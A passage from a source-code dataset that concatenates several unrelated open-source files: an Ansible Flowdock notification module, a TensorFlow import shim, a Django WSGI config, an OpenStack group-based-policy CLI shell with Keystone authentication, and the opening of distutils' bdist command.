module = AnsibleModule(
argument_spec=dict(
token=dict(required=True, no_log=True),
msg=dict(required=True),
type=dict(required=True, choices=["inbox","chat"]),
external_user_name=dict(required=False),
from_address=dict(required=False),
source=dict(required=False),
subject=dict(required=False),
from_name=dict(required=False),
reply_to=dict(required=False),
project=dict(required=False),
tags=dict(required=False),
link=dict(required=False),
validate_certs = dict(default='yes', type='bool'),
),
supports_check_mode=True
)
type = module.params["type"]
token = module.params["token"]
if type == 'inbox':
url = "https://api.flowdock.com/v1/messages/team_inbox/%s" % (token)
else:
url = "https://api.flowdock.com/v1/messages/chat/%s" % (token)
params = {}
# required params
params['content'] = module.params["msg"]
# required params for the 'chat' type
if module.params['external_user_name']:
if type == 'inbox':
module.fail_json(msg="external_user_name is not valid for the 'inbox' type")
else:
params['external_user_name'] = module.params["external_user_name"]
elif type == 'chat':
module.fail_json(msg="external_user_name is required for the 'chat' type")
# required params for the 'inbox' type
for item in [ 'from_address', 'source', 'subject' ]:
if module.params[item]:
if type == 'chat':
module.fail_json(msg="%s is not valid for the 'chat' type" % item)
else:
params[item] = module.params[item]
elif type == 'inbox':
module.fail_json(msg="%s is required for the 'inbox' type" % item)
# optional params
if module.params["tags"]:
params['tags'] = module.params["tags"]
# optional params for the 'inbox' type
for item in [ 'from_name', 'reply_to', 'project', 'link' ]:
if module.params[item]:
if type == 'chat':
module.fail_json(msg="%s is not valid for the 'chat' type" % item)
else:
params[item] = module.params[item]
# If we're in check mode, just exit pretending like we succeeded
if module.check_mode:
module.exit_json(changed=False)
# Send the data to Flowdock
data = urlencode(params)
response, info = fetch_url(module, url, data=data)
if info['status'] != 200:
module.fail_json(msg="unable to send msg: %s" % info['msg'])
module.exit_json(changed=True, msg=module.params["msg"])
# import module snippets
from ansible.module_utils.basic import *
from ansible.module_utils.urls import *
if __name__ == '__main__':
main()
| gpl-3.0 |
alsrgv/tensorflow | tensorflow/contrib/quantization/python/array_ops.py | 178 | 1156 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Quantized Array Operations."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
# pylint: disable=unused-import
from tensorflow.python.ops import gen_array_ops as quantized_gen_array_ops
from tensorflow.python.ops.gen_array_ops import dequantize
from tensorflow.python.ops.gen_array_ops import quantize_v2
from tensorflow.python.ops.gen_array_ops import quantized_concat
# pylint: enable=unused-import
| apache-2.0 |
ddbeck/gittip-calculator | gittip_calculator/gittip_calculator/wsgi.py | 1 | 1452 | """
WSGI config for gittip_calculator project.
This module contains the WSGI application used by Django's development server
and any production WSGI deployments. It should expose a module-level variable
named ``application``. Django's ``runserver`` and ``runfcgi`` commands discover
this application via the ``WSGI_APPLICATION`` setting.
Usually you will have the standard Django WSGI application here, but it also
might make sense to replace the whole Django WSGI application with a custom one
that later delegates to the Django one. For example, you could introduce WSGI
middleware here, or combine a Django application with an application of another
framework.
"""
import os
# We defer to a DJANGO_SETTINGS_MODULE already in the environment. This breaks
# if running multiple sites in the same mod_wsgi process. To fix this, use
# mod_wsgi daemon mode with each site in its own daemon process, or use
# os.environ["DJANGO_SETTINGS_MODULE"] = "gittip_calculator.settings"
os.environ.setdefault("DJANGO_SETTINGS_MODULE", "gittip_calculator.settings")
# This application object is used by any WSGI server configured to use this
# file. This includes Django's development server, if the WSGI_APPLICATION
# setting points here.
from django.core.wsgi import get_wsgi_application
application = get_wsgi_application()
# Apply WSGI middleware here.
# from helloworld.wsgi import HelloWorldApplication
# application = HelloWorldApplication(application)
| mit |
tbachman/python-group-based-policy-client | gbpclient/gbpshell.py | 1 | 34075 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
"""
Command-line interface to the GBP APIs
"""
from __future__ import print_function
import argparse
import logging
import os
import sys
from keystoneclient.auth.identity import v2 as v2_auth
from keystoneclient.auth.identity import v3 as v3_auth
from keystoneclient import discover
from keystoneclient.openstack.common.apiclient import exceptions as ks_exc
from keystoneclient import session
from oslo.utils import encodeutils
import six.moves.urllib.parse as urlparse
from cliff import app
from cliff import commandmanager
from neutronclient.common import clientmanager
from neutronclient.common import exceptions as exc
from neutronclient.common import utils
from neutronclient.i18n import _
from neutronclient.version import __version__
from gbpclient.gbp.v2_0 import groupbasedpolicy as gbp
from gbpclient.gbp.v2_0 import servicechain
VERSION = '2.0'
NEUTRON_API_VERSION = '2.0'
clientmanager.neutron_client.API_VERSIONS = {
'2.0': 'gbpclient.v2_0.client.Client',
}
def run_command(cmd, cmd_parser, sub_argv):
_argv = sub_argv
index = -1
values_specs = []
if '--' in sub_argv:
index = sub_argv.index('--')
_argv = sub_argv[:index]
values_specs = sub_argv[index:]
known_args, _values_specs = cmd_parser.parse_known_args(_argv)
cmd.values_specs = (index == -1 and _values_specs or values_specs)
return cmd.run(known_args)
def env(*_vars, **kwargs):
"""Search for the first defined of possibly many env vars.
Returns the first environment variable defined in vars, or
returns the default defined in kwargs.
"""
for v in _vars:
value = os.environ.get(v, None)
if value:
return value
return kwargs.get('default', '')
def check_non_negative_int(value):
try:
value = int(value)
except ValueError:
raise argparse.ArgumentTypeError(_("invalid int value: %r") % value)
if value < 0:
raise argparse.ArgumentTypeError(_("input value %d is negative") %
value)
return value
COMMAND_V2 = {
'policy-target-create': gbp.CreatePolicyTarget,
'policy-target-delete': gbp.DeletePolicyTarget,
'policy-target-update': gbp.UpdatePolicyTarget,
'policy-target-list': gbp.ListPolicyTarget,
'policy-target-show': gbp.ShowPolicyTarget,
'policy-target-group-create': gbp.CreatePolicyTargetGroup,
'policy-target-group-delete': gbp.DeletePolicyTargetGroup,
'policy-target-group-update': gbp.UpdatePolicyTargetGroup,
'policy-target-group-list': gbp.ListPolicyTargetGroup,
'policy-target-group-show': gbp.ShowPolicyTargetGroup,
'group-create': gbp.CreatePolicyTargetGroup,
'group-delete': gbp.DeletePolicyTargetGroup,
'group-update': gbp.UpdatePolicyTargetGroup,
'group-list': gbp.ListPolicyTargetGroup,
'group-show': gbp.ShowPolicyTargetGroup,
'l2policy-create': gbp.CreateL2Policy,
'l2policy-delete': gbp.DeleteL2Policy,
'l2policy-update': gbp.UpdateL2Policy,
'l2policy-list': gbp.ListL2Policy,
'l2policy-show': gbp.ShowL2Policy,
'l3policy-create': gbp.CreateL3Policy,
'l3policy-delete': gbp.DeleteL3Policy,
'l3policy-update': gbp.UpdateL3Policy,
'l3policy-list': gbp.ListL3Policy,
'l3policy-show': gbp.ShowL3Policy,
'network-service-policy-create': gbp.CreateNetworkServicePolicy,
'network-service-policy-delete': gbp.DeleteNetworkServicePolicy,
'network-service-policy-update': gbp.UpdateNetworkServicePolicy,
'network-service-policy-list': gbp.ListNetworkServicePolicy,
'network-service-policy-show': gbp.ShowNetworkServicePolicy,
'external-policy-create': gbp.CreateExternalPolicy,
'external-policy-delete': gbp.DeleteExternalPolicy,
'external-policy-update': gbp.UpdateExternalPolicy,
'external-policy-list': gbp.ListExternalPolicy,
'external-policy-show': gbp.ShowExternalPolicy,
'external-segment-create': gbp.CreateExternalSegment,
'external-segment-delete': gbp.DeleteExternalSegment,
'external-segment-update': gbp.UpdateExternalSegment,
'external-segment-list': gbp.ListExternalSegment,
'external-segment-show': gbp.ShowExternalSegment,
'nat-pool-create': gbp.CreateNatPool,
'nat-pool-delete': gbp.DeleteNatPool,
'nat-pool-update': gbp.UpdateNatPool,
'nat-pool-list': gbp.ListNatPool,
'nat-pool-show': gbp.ShowNatPool,
'policy-classifier-create': gbp.CreatePolicyClassifier,
'policy-classifier-delete': gbp.DeletePolicyClassifier,
'policy-classifier-update': gbp.UpdatePolicyClassifier,
'policy-classifier-list': gbp.ListPolicyClassifier,
'policy-classifier-show': gbp.ShowPolicyClassifier,
'policy-action-create': gbp.CreatePolicyAction,
'policy-action-delete': gbp.DeletePolicyAction,
'policy-action-update': gbp.UpdatePolicyAction,
'policy-action-list': gbp.ListPolicyAction,
'policy-action-show': gbp.ShowPolicyAction,
'policy-rule-create': gbp.CreatePolicyRule,
'policy-rule-delete': gbp.DeletePolicyRule,
'policy-rule-update': gbp.UpdatePolicyRule,
'policy-rule-list': gbp.ListPolicyRule,
'policy-rule-show': gbp.ShowPolicyRule,
'policy-rule-set-create': gbp.CreatePolicyRuleSet,
'policy-rule-set-delete': gbp.DeletePolicyRuleSet,
'policy-rule-set-update': gbp.UpdatePolicyRuleSet,
'policy-rule-set-list': gbp.ListPolicyRuleSet,
'policy-rule-set-show': gbp.ShowPolicyRuleSet,
'service-profile-list': servicechain.ListServiceProfile,
'service-profile-show': servicechain.ShowServiceProfile,
'service-profile-create': servicechain.CreateServiceProfile,
'service-profile-delete': servicechain.DeleteServiceProfile,
'service-profile-update': servicechain.UpdateServiceProfile,
'servicechain-node-list': servicechain.ListServiceChainNode,
'servicechain-node-show': servicechain.ShowServiceChainNode,
'servicechain-node-create': servicechain.CreateServiceChainNode,
'servicechain-node-delete': servicechain.DeleteServiceChainNode,
'servicechain-node-update': servicechain.UpdateServiceChainNode,
'servicechain-spec-list': servicechain.ListServiceChainSpec,
'servicechain-spec-show': servicechain.ShowServiceChainSpec,
'servicechain-spec-create': servicechain.CreateServiceChainSpec,
'servicechain-spec-delete': servicechain.DeleteServiceChainSpec,
'servicechain-spec-update': servicechain.UpdateServiceChainSpec,
'servicechain-instance-list': (
servicechain.ListServiceChainInstance
),
'servicechain-instance-show': (
servicechain.ShowServiceChainInstance
),
'servicechain-instance-create': (
servicechain.CreateServiceChainInstance
),
'servicechain-instance-delete': (
servicechain.DeleteServiceChainInstance
),
'servicechain-instance-update': (
servicechain.UpdateServiceChainInstance
),
}
COMMANDS = {'2.0': COMMAND_V2}
class HelpAction(argparse.Action):
"""Provide a custom action so the -h and --help options
to the main app will print a list of the commands.
The commands are determined by checking the CommandManager
instance, passed in as the "default" value for the action.
"""
def __call__(self, parser, namespace, values, option_string=None):
outputs = []
max_len = 0
app = self.default
parser.print_help(app.stdout)
app.api_version = '2.0' # Check this
app.stdout.write(_('\nCommands for GBP API v%s:\n') % app.api_version)
command_manager = app.command_manager
for name, ep in sorted(command_manager):
factory = ep.load()
cmd = factory(self, None)
one_liner = cmd.get_description().split('\n')[0]
outputs.append((name, one_liner))
max_len = max(len(name), max_len)
for (name, one_liner) in outputs:
app.stdout.write(' %s %s\n' % (name.ljust(max_len), one_liner))
sys.exit(0)
class GBPShell(app.App):
# verbose logging levels
WARNING_LEVEL = 0
INFO_LEVEL = 1
DEBUG_LEVEL = 2
CONSOLE_MESSAGE_FORMAT = '%(message)s'
DEBUG_MESSAGE_FORMAT = '%(levelname)s: %(name)s %(message)s'
log = logging.getLogger(__name__)
def __init__(self, apiversion):
super(GBPShell, self).__init__(
description=__doc__.strip(),
version=VERSION,
command_manager=commandmanager.CommandManager('gbp.cli'), )
self.commands = COMMANDS
for k, v in self.commands[apiversion].items():
self.command_manager.add_command(k, v)
# This is instantiated in initialize_app() only when using
# password flow auth
self.auth_client = None
self.api_version = apiversion
def build_option_parser(self, description, version):
"""Return an argparse option parser for this application.
Subclasses may override this method to extend
the parser with more global options.
:param description: full description of the application
:paramtype description: str
:param version: version number for the application
:paramtype version: str
"""
parser = argparse.ArgumentParser(
description=description,
add_help=False, )
parser.add_argument(
'--version',
action='version',
version=__version__, )
parser.add_argument(
'-v', '--verbose', '--debug',
action='count',
dest='verbose_level',
default=self.DEFAULT_VERBOSE_LEVEL,
help=_('Increase verbosity of output and show tracebacks on'
' errors. You can repeat this option.'))
parser.add_argument(
'-q', '--quiet',
action='store_const',
dest='verbose_level',
const=0,
help=_('Suppress output except warnings and errors.'))
parser.add_argument(
'-h', '--help',
action=HelpAction,
nargs=0,
default=self, # tricky
help=_("Show this help message and exit."))
parser.add_argument(
'-r', '--retries',
metavar="NUM",
type=check_non_negative_int,
default=0,
help=_("How many times the request to the Neutron server should "
"be retried if it fails."))
# FIXME(bklei): this method should come from python-keystoneclient
self._append_global_identity_args(parser)
return parser
def _append_global_identity_args(self, parser):
# FIXME(bklei): these are global identity (Keystone) arguments which
# should be consistent and shared by all service clients. Therefore,
# they should be provided by python-keystoneclient. We will need to
# refactor this code once this functionality is available in
# python-keystoneclient.
#
# Note: At that time we'll need to decide if we can just abandon
# the deprecated args (--service-type and --endpoint-type).
parser.add_argument(
'--os-service-type', metavar='<os-service-type>',
default=env('OS_NETWORK_SERVICE_TYPE', default='network'),
help=_('Defaults to env[OS_NETWORK_SERVICE_TYPE] or network.'))
parser.add_argument(
'--os-endpoint-type', metavar='<os-endpoint-type>',
default=env('OS_ENDPOINT_TYPE', default='publicURL'),
help=_('Defaults to env[OS_ENDPOINT_TYPE] or publicURL.'))
# FIXME(bklei): --service-type is deprecated but kept in for
# backward compatibility.
parser.add_argument(
'--service-type', metavar='<service-type>',
default=env('OS_NETWORK_SERVICE_TYPE', default='network'),
help=_('DEPRECATED! Use --os-service-type.'))
# FIXME(bklei): --endpoint-type is deprecated but kept in for
# backward compatibility.
parser.add_argument(
'--endpoint-type', metavar='<endpoint-type>',
default=env('OS_ENDPOINT_TYPE', default='publicURL'),
help=_('DEPRECATED! Use --os-endpoint-type.'))
parser.add_argument(
'--os-auth-strategy', metavar='<auth-strategy>',
default=env('OS_AUTH_STRATEGY', default='keystone'),
help=_('DEPRECATED! Only keystone is supported.'))
parser.add_argument(
'--os_auth_strategy',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-auth-url', metavar='<auth-url>',
default=env('OS_AUTH_URL'),
help=_('Authentication URL, defaults to env[OS_AUTH_URL].'))
parser.add_argument(
'--os_auth_url',
help=argparse.SUPPRESS)
project_name_group = parser.add_mutually_exclusive_group()
project_name_group.add_argument(
'--os-tenant-name', metavar='<auth-tenant-name>',
default=env('OS_TENANT_NAME'),
help=_('Authentication tenant name, defaults to '
'env[OS_TENANT_NAME].'))
project_name_group.add_argument(
'--os-project-name',
metavar='<auth-project-name>',
default=utils.env('OS_PROJECT_NAME'),
help='Another way to specify tenant name. '
'This option is mutually exclusive with '
' --os-tenant-name. '
'Defaults to env[OS_PROJECT_NAME].')
parser.add_argument(
'--os_tenant_name',
help=argparse.SUPPRESS)
project_id_group = parser.add_mutually_exclusive_group()
project_id_group.add_argument(
'--os-tenant-id', metavar='<auth-tenant-id>',
default=env('OS_TENANT_ID'),
help=_('Authentication tenant ID, defaults to '
'env[OS_TENANT_ID].'))
project_id_group.add_argument(
'--os-project-id',
metavar='<auth-project-id>',
default=utils.env('OS_PROJECT_ID'),
help='Another way to specify tenant ID. '
'This option is mutually exclusive with '
' --os-tenant-id. '
'Defaults to env[OS_PROJECT_ID].')
parser.add_argument(
'--os-username', metavar='<auth-username>',
default=utils.env('OS_USERNAME'),
help=_('Authentication username, defaults to env[OS_USERNAME].'))
parser.add_argument(
'--os_username',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-user-id', metavar='<auth-user-id>',
default=env('OS_USER_ID'),
help=_('Authentication user ID (Env: OS_USER_ID)'))
parser.add_argument(
'--os_user_id',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-user-domain-id',
metavar='<auth-user-domain-id>',
default=utils.env('OS_USER_DOMAIN_ID'),
help='OpenStack user domain ID. '
'Defaults to env[OS_USER_DOMAIN_ID].')
parser.add_argument(
'--os_user_domain_id',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-user-domain-name',
metavar='<auth-user-domain-name>',
default=utils.env('OS_USER_DOMAIN_NAME'),
help='OpenStack user domain name. '
'Defaults to env[OS_USER_DOMAIN_NAME].')
parser.add_argument(
'--os_user_domain_name',
help=argparse.SUPPRESS)
parser.add_argument(
'--os_project_id',
help=argparse.SUPPRESS)
parser.add_argument(
'--os_project_name',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-project-domain-id',
metavar='<auth-project-domain-id>',
default=utils.env('OS_PROJECT_DOMAIN_ID'),
help='Defaults to env[OS_PROJECT_DOMAIN_ID].')
parser.add_argument(
'--os-project-domain-name',
metavar='<auth-project-domain-name>',
default=utils.env('OS_PROJECT_DOMAIN_NAME'),
help='Defaults to env[OS_PROJECT_DOMAIN_NAME].')
parser.add_argument(
'--os-cert',
metavar='<certificate>',
default=utils.env('OS_CERT'),
help=_("Path of certificate file to use in SSL "
"connection. This file can optionally be "
"prepended with the private key. Defaults "
"to env[OS_CERT]"))
parser.add_argument(
'--os-cacert',
metavar='<ca-certificate>',
default=env('OS_CACERT', default=None),
help=_("Specify a CA bundle file to use in "
"verifying a TLS (https) server certificate. "
"Defaults to env[OS_CACERT]"))
parser.add_argument(
'--os-key',
metavar='<key>',
default=utils.env('OS_KEY'),
help=_("Path of client key to use in SSL "
"connection. This option is not necessary "
"if your key is prepended to your certificate "
"file. Defaults to env[OS_KEY]"))
parser.add_argument(
'--os-password', metavar='<auth-password>',
default=utils.env('OS_PASSWORD'),
help=_('Authentication password, defaults to env[OS_PASSWORD].'))
parser.add_argument(
'--os_password',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-region-name', metavar='<auth-region-name>',
default=env('OS_REGION_NAME'),
help=_('Authentication region name, defaults to '
'env[OS_REGION_NAME].'))
parser.add_argument(
'--os_region_name',
help=argparse.SUPPRESS)
parser.add_argument(
'--os-token', metavar='<token>',
default=env('OS_TOKEN'),
help=_('Authentication token, defaults to env[OS_TOKEN].'))
parser.add_argument(
'--os_token',
help=argparse.SUPPRESS)
parser.add_argument(
'--http-timeout', metavar='<seconds>',
default=env('OS_NETWORK_TIMEOUT', default=None), type=float,
help=_('Timeout in seconds to wait for an HTTP response. Defaults '
'to env[OS_NETWORK_TIMEOUT] or None if not specified.'))
parser.add_argument(
'--os-url', metavar='<url>',
default=env('OS_URL'),
help=_('Defaults to env[OS_URL].'))
parser.add_argument(
'--os_url',
help=argparse.SUPPRESS)
parser.add_argument(
'--insecure',
action='store_true',
default=env('NEUTRONCLIENT_INSECURE', default=False),
help=_("Explicitly allow neutronclient to perform \"insecure\" "
"SSL (https) requests. The server's certificate will "
"not be verified against any certificate authorities. "
"This option should be used with caution."))
def _bash_completion(self):
"""Prints all of the commands and options for bash-completion."""
commands = set()
options = set()
for option, _action in self.parser._option_string_actions.items():
options.add(option)
for command_name, command in self.command_manager:
commands.add(command_name)
cmd_factory = command.load()
cmd = cmd_factory(self, None)
cmd_parser = cmd.get_parser('')
for option, _action in cmd_parser._option_string_actions.items():
options.add(option)
print(' '.join(commands | options))
def run(self, argv):
"""Equivalent to the main program for the application.
:param argv: input arguments and options
:paramtype argv: list of str
"""
try:
index = 0
command_pos = -1
help_pos = -1
help_command_pos = -1
for arg in argv:
if arg == 'bash-completion':
self._bash_completion()
return 0
if arg in self.commands[self.api_version]:
if command_pos == -1:
command_pos = index
elif arg in ('-h', '--help'):
if help_pos == -1:
help_pos = index
elif arg == 'help':
if help_command_pos == -1:
help_command_pos = index
index = index + 1
if command_pos > -1 and help_pos > command_pos:
argv = ['help', argv[command_pos]]
if help_command_pos > -1 and command_pos == -1:
argv[help_command_pos] = '--help'
self.options, remainder = self.parser.parse_known_args(argv)
self.configure_logging()
self.interactive_mode = not remainder
self.initialize_app(remainder)
except Exception as err:
if self.options.verbose_level >= self.DEBUG_LEVEL:
self.log.exception(unicode(err))
raise
else:
self.log.error(unicode(err))
return 1
result = 1
if self.interactive_mode:
_argv = [sys.argv[0]]
sys.argv = _argv
result = self.interact()
else:
result = self.run_subcommand(remainder)
return result
def run_subcommand(self, argv):
subcommand = self.command_manager.find_command(argv)
cmd_factory, cmd_name, sub_argv = subcommand
cmd = cmd_factory(self, self.options)
err = None
result = 1
try:
self.prepare_to_run_command(cmd)
full_name = (cmd_name
if self.interactive_mode
else ' '.join([self.NAME, cmd_name])
)
cmd_parser = cmd.get_parser(full_name)
return run_command(cmd, cmd_parser, sub_argv)
except Exception as err:
if self.options.verbose_level >= self.DEBUG_LEVEL:
self.log.exception(unicode(err))
else:
self.log.error(unicode(err))
try:
self.clean_up(cmd, result, err)
except Exception as err2:
if self.options.verbose_level >= self.DEBUG_LEVEL:
self.log.exception(unicode(err2))
else:
self.log.error(_('Could not clean up: %s'), unicode(err2))
if self.options.verbose_level >= self.DEBUG_LEVEL:
raise
else:
try:
self.clean_up(cmd, result, None)
except Exception as err3:
if self.options.verbose_level >= self.DEBUG_LEVEL:
self.log.exception(unicode(err3))
else:
self.log.error(_('Could not clean up: %s'), unicode(err3))
return result
def authenticate_user(self):
"""Make sure the user has provided all of the authentication
info we need.
"""
if self.options.os_auth_strategy == 'keystone':
if self.options.os_token or self.options.os_url:
# Token flow auth takes priority
if not self.options.os_token:
raise exc.CommandError(
_("You must provide a token via"
" either --os-token or env[OS_TOKEN]"))
if not self.options.os_url:
raise exc.CommandError(
_("You must provide a service URL via"
" either --os-url or env[OS_URL]"))
else:
# Validate password flow auth
project_info = (self.options.os_tenant_name or
self.options.os_tenant_id or
(self.options.os_project_name and
(self.options.project_domain_name or
self.options.project_domain_id)) or
self.options.os_project_id)
if (not self.options.os_username
and not self.options.os_user_id):
raise exc.CommandError(
_("You must provide a username or user ID via"
" --os-username, env[OS_USERNAME] or"
" --os-user_id, env[OS_USER_ID]"))
if not self.options.os_password:
raise exc.CommandError(
_("You must provide a password via"
" either --os-password or env[OS_PASSWORD]"))
if (not project_info):
# tenent is deprecated in Keystone v3. Use the latest
# terminology instead.
raise exc.CommandError(
_("You must provide a project_id or project_name ("
"with project_domain_name or project_domain_id) "
"via "
" --os-project-id (env[OS_PROJECT_ID])"
" --os-project-name (env[OS_PROJECT_NAME]),"
" --os-project-domain-id "
"(env[OS_PROJECT_DOMAIN_ID])"
" --os-project-domain-name "
"(env[OS_PROJECT_DOMAIN_NAME])"))
if not self.options.os_auth_url:
raise exc.CommandError(
_("You must provide an auth url via"
" either --os-auth-url or via env[OS_AUTH_URL]"))
else: # not keystone
if not self.options.os_url:
raise exc.CommandError(
_("You must provide a service URL via"
" either --os-url or env[OS_URL]"))
auth_session = self._get_keystone_session()
self.client_manager = clientmanager.ClientManager(
token=self.options.os_token,
url=self.options.os_url,
auth_url=self.options.os_auth_url,
tenant_name=self.options.os_tenant_name,
tenant_id=self.options.os_tenant_id,
username=self.options.os_username,
user_id=self.options.os_user_id,
password=self.options.os_password,
region_name=self.options.os_region_name,
api_version=self.api_version,
auth_strategy=self.options.os_auth_strategy,
# FIXME (bklei) honor deprecated service_type and
# endpoint type until they are removed
service_type=self.options.os_service_type or
self.options.service_type,
endpoint_type=self.options.os_endpoint_type or self.endpoint_type,
insecure=self.options.insecure,
ca_cert=self.options.os_cacert,
timeout=self.options.http_timeout,
retries=self.options.retries,
raise_errors=False,
session=auth_session,
auth=auth_session.auth,
log_credentials=True)
return
def initialize_app(self, argv):
"""Global app init bits:
* set up API versions
* validate authentication info
"""
super(GBPShell, self).initialize_app(argv)
self.api_version = {'network': self.api_version}
# If the user is not asking for help, make sure they
# have given us auth.
cmd_name = None
if argv:
cmd_info = self.command_manager.find_command(argv)
cmd_factory, cmd_name, sub_argv = cmd_info
if self.interactive_mode or cmd_name != 'help':
self.authenticate_user()
def clean_up(self, cmd, result, err):
self.log.debug('clean_up %s', cmd.__class__.__name__)
if err:
self.log.debug('Got an error: %s', unicode(err))
def configure_logging(self):
"""Create logging handlers for any log output."""
root_logger = logging.getLogger('')
# Set up logging to a file
root_logger.setLevel(logging.DEBUG)
# Send higher-level messages to the console via stderr
console = logging.StreamHandler(self.stderr)
console_level = {self.WARNING_LEVEL: logging.WARNING,
self.INFO_LEVEL: logging.INFO,
self.DEBUG_LEVEL: logging.DEBUG,
}.get(self.options.verbose_level, logging.DEBUG)
console.setLevel(console_level)
if logging.DEBUG == console_level:
formatter = logging.Formatter(self.DEBUG_MESSAGE_FORMAT)
else:
formatter = logging.Formatter(self.CONSOLE_MESSAGE_FORMAT)
logging.getLogger('urllib3.connectionpool').setLevel(logging.WARNING)
console.setFormatter(formatter)
root_logger.addHandler(console)
return
def get_v2_auth(self, v2_auth_url):
return v2_auth.Password(
v2_auth_url,
username=self.options.os_username,
password=self.options.os_password,
tenant_id=self.options.os_tenant_id,
tenant_name=self.options.os_tenant_name)
def get_v3_auth(self, v3_auth_url):
project_id = self.options.os_project_id or self.options.os_tenant_id
project_name = (self.options.os_project_name or
self.options.os_tenant_name)
return v3_auth.Password(
v3_auth_url,
username=self.options.os_username,
password=self.options.os_password,
user_id=self.options.os_user_id,
user_domain_name=self.options.os_user_domain_name,
user_domain_id=self.options.os_user_domain_id,
project_id=project_id,
project_name=project_name,
project_domain_name=self.options.os_project_domain_name,
project_domain_id=self.options.os_project_domain_id
)
def _discover_auth_versions(self, session, auth_url):
# discover the API versions the server is supporting base on the
# given URL
try:
ks_discover = discover.Discover(session=session, auth_url=auth_url)
return (ks_discover.url_for('2.0'), ks_discover.url_for('3.0'))
except ks_exc.ClientException:
# Identity service may not support discover API version.
# Lets try to figure out the API version from the original URL.
url_parts = urlparse.urlparse(auth_url)
(scheme, netloc, path, params, query, fragment) = url_parts
path = path.lower()
if path.startswith('/v3'):
return (None, auth_url)
elif path.startswith('/v2'):
return (auth_url, None)
else:
# not enough information to determine the auth version
msg = _('Unable to determine the Keystone version '
'to authenticate with using the given '
'auth_url. Identity service may not support API '
'version discovery. Please provide a versioned '
'auth_url instead.')
raise exc.CommandError(msg)
def _get_keystone_session(self):
# first create a Keystone session
cacert = self.options.os_cacert or None
cert = self.options.os_cert or None
key = self.options.os_key or None
insecure = self.options.insecure or False
ks_session = session.Session.construct(dict(cacert=cacert,
cert=cert,
key=key,
insecure=insecure))
# discover the supported keystone versions using the given url
(v2_auth_url, v3_auth_url) = self._discover_auth_versions(
session=ks_session,
auth_url=self.options.os_auth_url)
# Determine which authentication plugin to use. First inspect the
# auth_url to see the supported version. If both v3 and v2 are
# supported, then use the highest version if possible.
user_domain_name = self.options.os_user_domain_name or None
user_domain_id = self.options.os_user_domain_id or None
project_domain_name = self.options.os_project_domain_name or None
project_domain_id = self.options.os_project_domain_id or None
domain_info = (user_domain_name or user_domain_id or
project_domain_name or project_domain_id)
if (v2_auth_url and not domain_info) or not v3_auth_url:
ks_session.auth = self.get_v2_auth(v2_auth_url)
else:
ks_session.auth = self.get_v3_auth(v3_auth_url)
return ks_session
def main(argv=sys.argv[1:]):
try:
return GBPShell(NEUTRON_API_VERSION).run(map(encodeutils.safe_decode,
argv))
except exc.NeutronClientException:
return 1
except Exception as e:
print(unicode(e))
return 1
if __name__ == "__main__":
sys.exit(main(sys.argv[1:]))
| apache-2.0 |
jchevin/MissionPlanner-master | Lib/distutils/command/bdist.py | 228 | 5596 | """distutils.command.bdist
Implements the Distutils 'bdist' command (create a built [binary]
distribution)."""
__revision__ = "$Id$"
import os
from distutils.util import get_platform
from distutils.core import Command
from distutils.errors import DistutilsPlatformError, DistutilsOptionError
def show_formats():
"""Print list of available formats (arguments to "--format" option).
"""
from distutils.fancy_getopt import FancyGetopt
formats = []
for format in bdist.format_commands:
formats.append(("formats=" + format, None,
bdist.format_command[format][1]))
pretty_printer = FancyGetopt(formats)
pretty_printer.print_help("List of available distribution formats:")
class bdist(Command):
description = "create a built (binary) distribution"
user_options = [('bdist-base=', 'b',
"temporary directory for creating built distributions"),
('plat-name=', 'p',
"platform name to embed in generated filenames "
"(default: %s)" % get_platform()),
('formats=', None,
"formats for distribution (comma-separated list)"),
('dist-dir=', 'd',
"directory to put final built distributions in "
"[default: dist]"),
('skip-build', None,
"skip rebuilding everything (for testing/debugging)"),
('owner=', 'u',
"Owner name used when creating a tar file"
" [default: current user]"),
('group=', 'g',
"Group name used when creating a tar file"
" [default: current group]"),
]
boolean_options = ['skip-build']
help_options = [
('help-formats', None,
"lists available distribution formats", show_formats),
]
# The following commands do not take a format option from bdist
no_format_option = ('bdist_rpm',)
# This won't do in reality: will need to distinguish RPM-ish Linux,
# Debian-ish Linux, Solaris, FreeBSD, ..., Windows, Mac OS.
default_format = {'posix': 'gztar',
'nt': 'zip',
'os2': 'zip'}
# Establish the preferred order (for the --help-formats option).
format_commands = ['rpm', 'gztar', 'bztar', 'ztar', 'tar',
'wininst', 'zip', 'msi']
# And the real information.
format_command = {'rpm': ('bdist_rpm', "RPM distribution"),
'gztar': ('bdist_dumb', "gzip'ed tar file"),
'bztar': ('bdist_dumb', "bzip2'ed tar file"),
'ztar': ('bdist_dumb', "compressed tar file"),
'tar': ('bdist_dumb', "tar file"),
'wininst': ('bdist_wininst',
"Windows executable installer"),
'zip': ('bdist_dumb', "ZIP file"),
'msi': ('bdist_msi', "Microsoft Installer")
}
def initialize_options(self):
self.bdist_base = None
self.plat_name = None
self.formats = None
self.dist_dir = None
self.skip_build = 0
self.group = None
self.owner = None
def finalize_options(self):
# have to finalize 'plat_name' before 'bdist_base'
if self.plat_name is None:
if self.skip_build:
self.plat_name = get_platform()
else:
self.plat_name = self.get_finalized_command('build').plat_name
# 'bdist_base' -- parent of per-built-distribution-format
# temporary directories (eg. we'll probably have
# "build/bdist.<plat>/dumb", "build/bdist.<plat>/rpm", etc.)
if self.bdist_base is None:
build_base = self.get_finalized_command('build').build_base
